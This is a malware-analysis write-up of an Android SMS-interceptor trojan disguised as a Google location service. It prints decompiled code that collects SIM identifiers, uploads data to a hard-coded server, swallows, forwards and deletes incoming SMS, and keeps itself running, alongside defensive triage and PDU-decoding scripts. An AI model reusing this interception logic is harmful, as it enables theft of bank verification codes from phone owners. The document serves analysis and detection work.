一. Sample information
Sample source: http://www.52pojie.cn/thread-443228-1-1.html
File name: 拦截马.apk ("interceptor trojan")
MD5: d9af14e323ec322252af93d246d735dd
File size: 60.42 KB
Upload time: 2015-12-08 19:54:40
Package name: com.google.process.locations
Minimum runtime environment: Android 2.3, 2.3.1, 2.3.2
Copyright: Android
二. Behavior analysis
When run in a virtual machine the sample asks the user to "activate device performance". That dialog is Android's device-administrator activation prompt (see the DeviceReciver entry in the manifest and InActivity in section 7), not a root prompt. Once the administrator has been activated, an attempt to revoke it turns the screen black, the launcher can no longer be reached, and antivirus software cannot clean the sample:
The sample cannot be uninstalled:
Antivirus software cannot uninstall it either:
三. Code analysis
Decompile the sample and start with the manifest and the permissions it requests:
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.process.locations" platformBuildVersionCode="21" platformBuildVersionName="APKTOOL">
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SIGNAL_PERSISTENT_PROCESSES"/>
<uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
<uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
<uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.BATTERY_STATS"/>
<uses-permission android:name="android.permission.BROADCAST_STICKY"/>
<uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE"/>
<uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<application android:allowBackup="false" android:icon="@drawable/ic_launcher" android:label="@string/app_name" android:name=".GoogleApplication" android:persistent="true" android:theme="@style/AppTheme">
<activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
<activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".InActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="*" android:pathPrefix="/m" android:scheme="googles"/>
</intent-filter>
</activity>
<receiver android:name=".BootReceiver">
<intent-filter android:priority="1000">
<action android:name="android.intent.action.BOOT_COMPLETED"/>
<action android:name="android.intent.action.PRE_BOOT_COMPLETED"/>
<action android:name="android.intent.action.REBOOT"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.PACKAGE_ADDED"/>
<action android:name="android.intent.action.PACKAGE_CHANGED"/>
<action android:name="android.intent.action.PACKAGE_REMOVED"/>
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED"/>
<action android:name="android.intent.action.PACKAGE_INSTALL"/>
<action android:name="android.intent.action.PACKAGE_REPLACED"/>
<action android:name="android.intent.action.PACKAGE_RESTARTED"/>
<data android:scheme="package"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SECRET_CODE"/>
<category android:name="android.intent.category.HOME"/>
<data android:host="06" android:scheme="android_secret_code"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.PHONE_STATE"/>
<action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
<action android:name="android.intent.action.SIG_STR"/>
<action android:name="android.intent.action.SERVICE_STATE"/>
<action android:name="android.intent.action.AIRPLANE_MODE"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.TIME_SET"/>
<action android:name="android.intent.action.TIMEZONE_CHANGED"/>
<action android:name="android.intent.action.LOCALE_CHANGED"/>
<action android:name="android.intent.action.DATE_CHANGED"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
<action android:name="android.intent.action.POWER_USAGE_SUMMARY"/>
<action android:name="android.intent.action.ACTION_SHUTDOWN"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.SYNC_STATE_CHANGED"/>
<action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.HEADSET_PLUG"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.media.RINGER_MODE_CHANGED"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL"/>
<action android:name="android.intent.action.MEDIA_EJECT"/>
<action android:name="android.intent.action.MEDIA_MOUNTED"/>
<action android:name="android.intent.action.MEDIA_REMOVED"/>
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED"/>
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED"/>
<action android:name="android.intent.action.MEDIA_SCANNER_SHARED"/>
<action android:name="android.intent.action.MEDIA_UNMOUNTED"/>
</intent-filter>
</receiver>
<receiver android:name=".SmsReciver">
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
<receiver android:name=".SmsReciver" android:permission="android.permission.BROADCAST_SMS">
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_DELIVER"/>
</intent-filter>
</receiver>
<receiver android:description="@string/device_info" android:label="@string/device" android:name=".DeviceReciver" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
</intent-filter>
</receiver>
<service android:enabled="true" android:name="com.google.process.locations.GoogleLocationService" android:process=""/>
<receiver android:name="d.d.SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_DELIVER"/>
</intent-filter>
</receiver>
<receiver android:name="d.d.MmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH">
<intent-filter>
<action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
<data android:mimeType="application/vnd.wap.mms-message"/>
</intent-filter>
</receiver>
<activity android:name="d.d.ComposeSmsActivity">
<intent-filter>
<action android:name="android.intent.action.SEND"/>
<action android:name="android.intent.action.SENDTO"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="sms"/>
<data android:scheme="smsto"/>
<data android:scheme="mms"/>
<data android:scheme="mmsto"/>
</intent-filter>
</activity>
<service android:exported="true" android:name="d.d.HeadlessSmsSendService" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
<intent-filter>
<action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
<category android:name="android.intent.category.DEFAULT"/>
<data android:scheme="sms"/>
<data android:scheme="smsto"/>
<data android:scheme="mms"/>
<data android:scheme="mmsto"/>
</intent-filter>
</service>
<service android:name="d.d.Default"/>
</application>
</manifest>
Before the permissions, the manifest itself already describes the design.
The <application> element carries android:persistent="true" (a request to be kept alive; only honoured for system apps, but it shows the intent), and BootReceiver registers at android:priority="1000" for BOOT_COMPLETED and for a long list of system broadcasts (package changes, connectivity, time, power, media, headset), so the sample is restarted by almost any system event.
SmsReciver listens for SMS_RECEIVED at priority 1000, which places it ahead of the stock messaging app and lets it abort the broadcast (section 3) on Android below 4.4.
The d.d.* components (an SMS_DELIVER receiver guarded by BROADCAST_SMS, a WAP_PUSH_DELIVER receiver guarded by BROADCAST_WAP_PUSH, a RESPOND_VIA_MESSAGE service and a SENDTO/SEND activity for the sms/smsto/mms/mmsto schemes) are exactly the set Android 4.4+ requires before an app can be selected as the default SMS app. They are there so that SMS interception and SMS deletion keep working on KitKat and later, where only the default SMS app may consume incoming SMS and write to the SMS provider.
DeviceReciver is a device administrator (android:permission="android.permission.BIND_DEVICE_ADMIN" plus the device_admin meta-data); an active administrator cannot be uninstalled until it has been deactivated.
BootReceiver also handles the SECRET_CODE broadcast for code 06 (dialing *#*#06#*#*), and InActivity is exported with a BROWSABLE filter for the googles:// scheme with path prefix /m, so both can be triggered from the dialer or from a link.
The sensitive permissions among those requested:
com.android.launcher.permission.INSTALL_SHORTCUT // create launcher shortcuts
android.permission.READ_SMS // read stored SMS
android.permission.RECEIVE_SMS // receive (monitor) incoming SMS
android.permission.WRITE_SMS // write to the SMS store
android.permission.SEND_SMS // send SMS
android.permission.MOUNT_UNMOUNT_FILESYSTEMS // mount and unmount external filesystems
android.permission.GET_TASKS // list current and recently running tasks
android.permission.READ_LOGS // read system logs (used by the logcat reader in section 6)
android.permission.RECEIVE_BOOT_COMPLETED // receive the boot-completed broadcast
android.permission.PERSISTENT_ACTIVITY // make an Activity persistent (deprecated, no effect on modern Android)
android.permission.ACCESS_COARSE_LOCATION // coarse location
android.permission.ACCESS_FINE_LOCATION // precise location
android.permission.ACCESS_WIFI_STATE // read Wi-Fi state
android.permission.CHANGE_WIFI_STATE // change Wi-Fi state
android.permission.WRITE_SETTINGS // write system settings
android.permission.INTERNET // open network sockets
android.permission.WRITE_EXTERNAL_STORAGE // write external storage (SD card)
android.permission.READ_PHONE_STATE // read phone state (line number, SIM serial, IMSI, IMEI)
android.permission.WAKE_LOCK // keep the CPU running after the screen turns off
android.permission.SIGNAL_PERSISTENT_PROCESSES // send signals to persistent processes
android.permission.DISABLE_KEYGUARD // disable the keyguard (lock screen)
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS // extra location-provider commands
android.permission.ACCESS_MOCK_LOCATION // mock location
android.permission.ACCESS_NETWORK_STATE // read network state
android.permission.BATTERY_STATS // battery statistics
android.permission.BROADCAST_STICKY // send sticky broadcasts
android.permission.CHANGE_CONFIGURATION // change configuration (locale, orientation, ...)
android.permission.CHANGE_NETWORK_STATE // change network connectivity
android.permission.CHANGE_WIFI_MULTICAST_STATE // change Wi-Fi multicast state
android.permission.CLEAR_APP_CACHE // clear app caches
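The manifest review above is the kind of check worth automating when many "拦截马" variants come in. The script below is an added example (not code from the original post or from the sample): it parses a manifest with the standard library and reports the traits discussed here, i.e. the SMS permission set, a boot receiver, android:persistent, device-administrator components, high-priority SMS_RECEIVED receivers, BROWSABLE entry points, and whether the app declares the full component set Android 4.4+ requires of a default SMS app. SAMPLE_MANIFEST is a constructed, trimmed copy of the decompiled manifest quoted above; in practice feed it the AndroidManifest.xml that apktool produces.

```python
"""Static triage of an AndroidManifest.xml for SMS-interceptor traits (added example)."""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: XML namespace

SMS_PERMS = {"android.permission." + p for p in ("READ_SMS", "RECEIVE_SMS", "WRITE_SMS", "SEND_SMS")}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BROWSABLE = "android.intent.category.BROWSABLE"
# Actions that must all be handled before Android 4.4+ offers an app as default SMS app.
DEFAULT_SMS_APP = {
    "android.provider.Telephony.SMS_DELIVER",
    "android.provider.Telephony.WAP_PUSH_DELIVER",
    "android.intent.action.RESPOND_VIA_MESSAGE",
    "android.intent.action.SENDTO",
}


def _names(parent, tag):
    """android:name values of all <tag> children of parent."""
    return {e.get(A + "name") for e in parent.findall(tag)}


def triage_manifest(xml_text):
    """Return a dict of interceptor / persistence indicators found in the manifest."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    perms = _names(root, "uses-permission")
    f = {
        "package": root.get("package"),
        "sms_permissions": sorted(perms & SMS_PERMS),
        "boot_receiver": "android.permission.RECEIVE_BOOT_COMPLETED" in perms,
        "persistent_flag": app.get(A + "persistent") == "true",
        "device_admin_receivers": [],   # components guarded by BIND_DEVICE_ADMIN
        "sms_received_receivers": [],   # (component, priority) of SMS_RECEIVED filters
        "browsable_schemes": [],        # (component, scheme) reachable from a link
    }
    seen_actions = set()
    for comp in app:                    # activity / receiver / service / provider
        name = comp.get(A + "name")
        if comp.get(A + "permission") == "android.permission.BIND_DEVICE_ADMIN":
            f["device_admin_receivers"].append(name)
        for filt in comp.findall("intent-filter"):
            actions = _names(filt, "action")
            seen_actions |= actions
            if SMS_RECEIVED in actions:
                f["sms_received_receivers"].append((name, int(filt.get(A + "priority", "0"))))
            if BROWSABLE in _names(filt, "category"):
                for d in filt.findall("data"):
                    if d.get(A + "scheme"):
                        f["browsable_schemes"].append((name, d.get(A + "scheme")))
    f["declares_default_sms_app_set"] = DEFAULT_SMS_APP <= seen_actions
    return f


# Constructed, trimmed copy of the sample's manifest (not the full decompiled file).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.process.locations">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:name=".GoogleApplication" android:persistent="true">
    <activity android:name=".InActivity"><intent-filter>
      <action android:name="android.intent.action.VIEW"/>
      <category android:name="android.intent.category.BROWSABLE"/>
      <data android:host="*" android:pathPrefix="/m" android:scheme="googles"/>
    </intent-filter></activity>
    <receiver android:name=".SmsReciver"><intent-filter android:priority="1000">
      <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter></receiver>
    <receiver android:name=".SmsReciver" android:permission="android.permission.BROADCAST_SMS"><intent-filter>
      <action android:name="android.provider.Telephony.SMS_DELIVER"/>
    </intent-filter></receiver>
    <receiver android:name=".DeviceReciver" android:permission="android.permission.BIND_DEVICE_ADMIN"><intent-filter>
      <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
    </intent-filter></receiver>
    <receiver android:name="d.d.MmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH"><intent-filter>
      <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
    </intent-filter></receiver>
    <activity android:name="d.d.ComposeSmsActivity"><intent-filter>
      <action android:name="android.intent.action.SENDTO"/>
      <category android:name="android.intent.category.BROWSABLE"/>
      <data android:scheme="smsto"/>
    </intent-filter></activity>
    <service android:name="d.d.HeadlessSmsSendService"><intent-filter>
      <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
    </intent-filter></service>
  </application>
</manifest>"""

if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

Any one of these indicators is common in benign apps; it is the combination (all four SMS permissions, a priority-1000 SMS_RECEIVED receiver, the default-SMS-app component set and a device administrator in one small package) that marks an interceptor.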
Malicious behavior 1: collecting device information (phone number, SIM serial, IMSI, OS version). Note that the JSON key "imei" is actually filled from getSimSerialNumber(), i.e. the ICCID, and "imsi" from getSubscriberId(); the IMEI proper (getDeviceId()) is not read in this routine. The listing is decompiler output; labels and the odd loop are decompiler artifacts, not original source:
if ((paramBoolean) || (!bool))
{
  TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); // collects phone number, ICCID, IMSI and OS version
  if (localTelephonyManager.getSimState() == 5) // 5 == TelephonyManager.SIM_STATE_READY
  {
    str1 = localTelephonyManager.getLine1Number();    // subscriber phone number (may be empty)
    str2 = localTelephonyManager.getSimSerialNumber(); // ICCID, uploaded under the key "imei"
    str3 = localTelephonyManager.getSubscriberId();    // IMSI
    str4 = Build.VERSION.SDK_INT;                      // API level (an int; the decompiler dropped the String conversion)
    str5 = Build.VERSION.RELEASE;                      // Android version string
    localJSONObject = new JSONObject();
  }
}
try
{
  localJSONObject.put("tel", str1);
  localJSONObject.put("imei", str2);
  localJSONObject.put("imsi", str3);
  localJSONObject.put("sdk", str4);
  localJSONObject.put("release", str5);
  if (GoogleApplication.d);        // d is the interception switch
  for (int i = 2; ; i = 1)         // "mode" is 2 while interception is on, otherwise 1
  {
    localJSONObject.put("mode", i);
    i.a(this, 2, localJSONObject); // upload to the remote server (numeric type tag 2; SMS records use 4, see section 3)
    label183: localSharedPreferences.edit().putBoolean("num", true).commit(); // remember that the device record was sent
    if (!paramBoolean)
      GoogleApplication.g = localSharedPreferences.getBoolean("send", true);
    return;
  }
}
Malicious behavior 2: contacting the remote server. The address is a hard-coded IP; the upload helper i.a() that uses this client is not shown in the post:
public static String b()
{
  return "45.127.99.27"; // remote server address; opened in a browser it serves a phishing page impersonating ICBC (Industrial and Commercial Bank of China)
}
public static DefaultHttpClient b(String paramString) // builds the Apache HttpClient used for uploads; paramString is the User-Agent
{
  BasicHttpParams localBasicHttpParams = new BasicHttpParams();
  localBasicHttpParams.setParameter("http.protocol.cookie-policy", ""); // selects the custom cookie spec registered under "" below
  HttpProtocolParams.setVersion(localBasicHttpParams, HttpVersion.HTTP_1_1);
  HttpProtocolParams.setContentCharset(localBasicHttpParams, "ISO-8859-1");
  HttpProtocolParams.setUseExpectContinue(localBasicHttpParams, true);
  HttpProtocolParams.setUserAgent(localBasicHttpParams, paramString);
  HttpConnectionParams.setConnectionTimeout(localBasicHttpParams, 3000); // 3 s connect timeout
  HttpConnectionParams.setSoTimeout(localBasicHttpParams, 3000);         // 3 s read timeout
  SchemeRegistry localSchemeRegistry = new SchemeRegistry();
  localSchemeRegistry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
  localSchemeRegistry.register(new Scheme("https", SSLSocketFactory.getSocketFactory(), 443));
  DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient(new ThreadSafeClientConnManager(localBasicHttpParams, localSchemeRegistry), localBasicHttpParams);
  j localj = new j(); // j is the sample's own CookieSpecFactory implementation (not shown)
  localDefaultHttpClient.getCookieSpecs().register("", localj);
  return localDefaultHttpClient;
}
Malicious behavior 3: reading and intercepting SMS. (The original heading also mentions the address book, but the manifest requests no READ_CONTACTS permission and no contacts access appears in the code, so only SMS are read.) Two pieces cooperate: a ContentObserver on the SMS provider that reports every change, and a high-priority SMS_RECEIVED receiver that can swallow the incoming message:
import android.content.ContentResolver;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
import org.json.JSONException;
import org.json.JSONObject;
class g extends ContentObserver // watches content://sms/; registered from GoogleLocationService.g() (section 5)
{
  private final GoogleLocationService a; // owning service (the decompiler dropped this field and its assignment)
  private Cursor b = null;
  public g(GoogleLocationService paramGoogleLocationService, Handler paramHandler)
  {
    super(paramHandler);
    this.a = paramGoogleLocationService;
  }
  public void onChange(boolean paramBoolean)
  {
    super.onChange(paramBoolean);
    // read the newest message in the SMS store and format it as JSON
    Cursor localCursor = this.a.getContentResolver().query(Uri.parse("content://sms/"), new String[] { "_id", "address", "person", "body", "date", "type" }, null, null, "_id desc");
    String str1;
    String str2;
    String str3;
    int n;
    JSONObject localJSONObject;
    if ((localCursor.getCount() > 0) && (localCursor.moveToFirst()))
    {
      int i = localCursor.getColumnIndex("address");
      int j = localCursor.getColumnIndex("body");
      int k = localCursor.getColumnIndex("date");
      int m = localCursor.getColumnIndex("type");
      str1 = localCursor.getString(i);
      str2 = localCursor.getString(j);
      str3 = localCursor.getString(k);
      n = localCursor.getInt(m); // 1 == MESSAGE_TYPE_INBOX
      localJSONObject = new JSONObject();
    }
    try
    {
      localJSONObject.put("number", str1);
      localJSONObject.put("time", str3);
      localJSONObject.put("body", str2);
      localJSONObject.put("type", n);
      if ((n % 2 == 1) && (GoogleApplication.d)) // incoming message and interception switched on:
        i.a(this.a.getApplicationContext(), str2);  // delete it from the inbox (section 4)
      i.a(this.a, 4, localJSONObject);              // upload the record (type tag 4)
      label241: localCursor.close();
      return;
    }
    catch (JSONException localJSONException)
    {
      break label241;
    }
  }
}
public class SmsReciver extends BroadcastReceiver // SMS_RECEIVED receiver registered at priority 1000
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Object localObject1 = null;
    Bundle localBundle = paramIntent.getExtras();
    Object[] arrayOfObject;
    int j;
    String str1;
    String str2;
    if (localBundle != null)
    {
      if (GoogleApplication.d)
        abortBroadcast(); // interception: lower-priority receivers (the stock SMS app) never see the message; effective only below Android 4.4, where the default-SMS-app components take over
      arrayOfObject = (Object[])localBundle.get("pdus"); // raw SMS-DELIVER PDUs, one per message part
      int i = arrayOfObject.length;
      j = 0;
      str1 = null;
      str2 = null;
      // the loop that parses each PDU into sender, body and timestamp was dropped by the
      // decompiler; only its exit condition survives, so the listing would NPE as written
      if (j >= i)
        i.a(paramContext, str2.toString(), str1.toString(), localObject1.toString(), 1); // upload the intercepted message (type tag 1)
    }
    else
    {
      return;
    }
  }
}
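The "pdus" extra that SmsReciver reads holds one raw SMS-DELIVER PDU per message part, and the dropped loop is where sender, timestamp and body are extracted from it. The decoder below is an added example, not code from the sample; it reproduces that step so the fields the sample forwards ("number", "time", "body") can be seen coming out of the wire format. It assumes GSM PDUs with the leading SMSC field (as the RIL hands them to SMS_RECEIVED), no user-data header, and 7-bit or UCS-2 coding; both test PDUs are constructed, and the GSM alphabet table is deliberately partial.

```python
"""Decode a GSM SMS-DELIVER PDU as found in the SMS_RECEIVED "pdus" extra (added example)."""
import datetime

# The GSM 7-bit default alphabet equals ASCII for letters, digits and most punctuation;
# only the differing codes are listed (assumption: partial table), the rest map to "?".
GSM_SPECIAL = {0x00: "@", 0x02: "$", 0x0A: "\n", 0x0D: "\r", 0x11: "_", 0x24: "¤",
               0x40: "¡", 0x5B: "Ä", 0x5C: "Ö", 0x5D: "Ñ", 0x5E: "Ü", 0x5F: "§",
               0x60: "¿", 0x7B: "ä", 0x7C: "ö", 0x7D: "ñ", 0x7E: "ü", 0x7F: "à"}

# Constructed test vectors: "hellohello" from 27838890001 via SMSC +27381000015 (7-bit),
# and the UCS-2 text "验证" from +27838890001 with no SMSC field.
SAMPLE_PDU_7BIT = "07917283010010F5040BC87238880900F10000993092516195800AE8329BFD4697D9EC37"
SAMPLE_PDU_UCS2 = "00040B917238880900F1000851218091450423049A8C8BC1"


def _digits(data, ndigits=None):
    """BCD digits stored low nibble first; an 0xF nibble pads an odd digit count."""
    s = "".join(f"{b & 0x0F:x}{b >> 4:x}" for b in data)
    return s[:ndigits] if ndigits is not None else s.rstrip("f")


def _bcd(b):
    """One swapped-BCD byte of the service-centre timestamp."""
    return (b & 0x0F) * 10 + (b >> 4)


def _unpack_7bit(data, nseptets):
    """Septet i occupies bits 7i..7i+6 of the little-endian bit string."""
    n = int.from_bytes(data, "little")
    return [(n >> (7 * i)) & 0x7F for i in range(nseptets)]


def _gsm_text(septets):
    return "".join(GSM_SPECIAL.get(c, chr(c) if 0x20 <= c < 0x7F else "?") for c in septets)


def decode_sms_deliver(pdu_hex):
    """Return smsc, sender, timestamp (ISO 8601 with offset) and text of one PDU."""
    b = bytes.fromhex(pdu_hex)
    smsc_len = b[0]                                   # octets including the type-of-address byte
    smsc = ""
    if smsc_len:
        smsc = ("+" if b[1] & 0x70 == 0x10 else "") + _digits(b[2:1 + smsc_len])
    pos = 1 + smsc_len
    first = b[pos]; pos += 1
    if first & 0x03 != 0x00:
        raise ValueError("not an SMS-DELIVER PDU")
    if first & 0x40:
        raise ValueError("user-data header present (concatenated SMS not handled here)")
    ndigits, toa = b[pos], b[pos + 1]; pos += 2
    nbytes = (ndigits + 1) // 2
    sender = _digits(b[pos:pos + nbytes], ndigits); pos += nbytes
    if toa & 0x70 == 0x10:                            # type-of-number 001 = international
        sender = "+" + sender
    pid, dcs = b[pos], b[pos + 1]; pos += 2
    ts = b[pos:pos + 7]; pos += 7
    yy, mo, dd, hh, mi, ss = (_bcd(x) for x in ts[:6])
    quarters = ((ts[6] & 0x07) * 10 + (ts[6] >> 4)) * (-1 if ts[6] & 0x08 else 1)
    tz = datetime.timezone(datetime.timedelta(minutes=15 * quarters))
    year = 2000 + yy if yy < 70 else 1900 + yy        # assumption: two-digit year pivot at 70
    when = datetime.datetime(year, mo, dd, hh, mi, ss, tzinfo=tz)
    udl = b[pos]; ud = b[pos + 1:]
    if dcs & 0x0C == 0x08:                            # UCS-2: udl counts bytes
        text = ud[:udl].decode("utf-16-be")
    elif dcs & 0x0C == 0x00:                          # GSM 7-bit: udl counts septets
        text = _gsm_text(_unpack_7bit(ud, udl))
    else:                                             # 8-bit data: leave as hex
        text = ud[:udl].hex()
    return {"smsc": smsc, "sender": sender, "pid": pid, "dcs": dcs,
            "timestamp": when.isoformat(), "text": text}


if __name__ == "__main__":
    for pdu in (SAMPLE_PDU_7BIT, SAMPLE_PDU_UCS2):
        print(decode_sms_deliver(pdu))
```

On a real device the sample gets exactly these fields from SmsMessage.createFromPdu(); the UCS-2 path is the one that matters for Chinese bank notifications, since any non-Latin text is sent with DCS 0x08.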
Malicious behavior 4: deleting SMS. (Again SMS only: there is no WRITE_CONTACTS permission and no contacts code.) This is the i.a(Context, String) called from g.onChange() in section 3 with the body of the newest message, so an intercepted message is removed from the inbox and its record uploaded before the user can read it. On Android 4.4+ only the default SMS app may delete from content://sms, which is what the d.d.* components in the manifest are for:
public static void a(Context paramContext, String paramString)
{
  try
  {
    Uri localUri = Uri.parse("content://sms/inbox");
    Cursor localCursor = paramContext.getContentResolver().query(localUri, null, "read=0", null, null); // unread inbox messages
    while (true)
    {
      if (!localCursor.moveToNext())
        return;
      if (!localCursor.getString(localCursor.getColumnIndex("body")).trim().equals(paramString)) // only the message whose body matches the one just forwarded
        continue;
      int i = localCursor.getInt(localCursor.getColumnIndex("_id"));
      paramContext.getContentResolver().delete(Uri.parse("content://sms"), "_id=" + i, null); // delete it from the SMS store
    }
  }
  catch (Exception localException)
  {
  }
}
Malicious behavior 5: sending SMS, together with the service watchdog. All of this sits in GoogleLocationService, the service that hosts the SMS observer:
private void g() // registers the ContentObserver of section 3 on the SMS provider
{
  g localg = new g(this, new Handler());
  getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localg);
}
void Prompt(String paramString)
{
  SmsManager.getDefault().sendTextMessage("18839763762", (String)null, paramString, (PendingIntent)null, (PendingIntent)null); // send an SMS to the hard-coded number 18839763762
}
public IBinder onBind(Intent paramIntent)
{
  return null;
}
public void onCreate()
{
  // watchdog: an RTC alarm (1 == AlarmManager.RTC) re-delivers a start-service intent at a requested
  // interval of 5 s, so the service comes back within seconds if it is killed;
  // 268435456 == PendingIntent.FLAG_CANCEL_CURRENT
  Intent localIntent = new Intent(getApplicationContext(), GoogleLocationService.class);
  this.a = ((AlarmManager)getSystemService("alarm"));
  this.b = PendingIntent.getService(this, 0, localIntent, 268435456);
  long l = System.currentTimeMillis();
  this.a.setInexactRepeating(1, l, 5000L, this.b);
  super.onCreate();
  c();
}
Behavior 6, reassessed: the ADRTLogCatReader class. The original post read this as "obtaining a command-line environment and executing string commands", but it is not part of the sample's own logic. The com.adrt classes (ADRTLogCatReader, ADRTSender) are the debug runtime that the on-device IDE AIDE bundles into every app it builds, and paramString is the package name of the AIDE debugger. The code only does anything when the app is debuggable (flag 0x2 == ApplicationInfo.FLAG_DEBUGGABLE) and that debugger package is installed; it then runs logcat and forwards the lines to the debugger by broadcast. What it does tell us is that the sample was compiled with AIDE on an Android device, and it is the consumer of the READ_LOGS permission:
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
public class ADRTLogCatReader
  implements Runnable
{
  private static Context context;
  public static void onContext(Context paramContext, String paramString) // paramString: package name of the debugger app
  {
    if (context != null)
      return;
    context = paramContext.getApplicationContext();
    int i;
    if ((0x2 & paramContext.getApplicationInfo().flags) != 0) // ApplicationInfo.FLAG_DEBUGGABLE
      i = 1;
    while (i != 0)
      try
      {
        paramContext.getPackageManager().getPackageInfo(paramString, 128); // throws if the debugger is not installed
        ADRTSender.onContext(context, paramString);
        new Thread(new ADRTLogCatReader(), "LogCat").start();
        return;
        i = 0;
      }
      catch (PackageManager.NameNotFoundException localNameNotFoundException)
      {
      }
  }
  public void run()
  {
    try
    {
      // runs "logcat -v threadtime" and forwards every line to the debugger package
      BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);
      while (true)
      {
        String str = localBufferedReader.readLine();
        if (str == null)
          break;
        ADRTSender.sendLogcatLines(new String[] { str });
      }
    }
    catch (IOException localIOException)
    {
    }
  }
}
// from class ADRTSender (same debug runtime): the data is sent only to debuggerPackageName, not to the network
public static void sendFields(String paramString1, String paramString2, ArrayList<String> paramArrayList1, ArrayList<String> paramArrayList2, ArrayList<String> paramArrayList3)
{
